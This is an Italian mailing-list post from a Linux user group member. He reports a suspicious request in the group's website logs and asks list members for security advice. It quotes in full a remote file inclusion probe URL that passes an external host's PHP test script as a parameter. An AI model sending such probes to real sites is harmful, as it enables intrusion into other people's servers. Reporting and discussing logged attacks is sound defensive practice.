[bglug] Defacing... qualcuno ci prova sempre...
Andrea Mangiatordi
andrea.mangiatordi@gmail.com
Mer 23 Apr 2008 13:13:41 CEST
Cari tutti,
stavo dando un'occhiata alle statistiche di accesso al sito del LUG. Ho
notato che qualcuno ha puntato a questa url:
http://bglug.linux.it/?rootSys=http://m4r0c.com/rfi-scan/test.txt???
l'url passata come parametro get contiene del codice php che fa una
serie di check su alcune delle vulnerabilità più note, in particolare
sul valore dell'opzione secure_mode di php.
Wordpress dovrebbe essere abbastanza al sicuro da questo tipo di
attacchi, ma mi piacerebbe comunque sentire il parere di qualche esperto
di sicurezza della lista circa l'argomento.
Ciao,
AM
--
Andrea Mangiatordi
www.farfalla-project.org
www.bglug.it
Maggiori informazioni sulla lista
bglug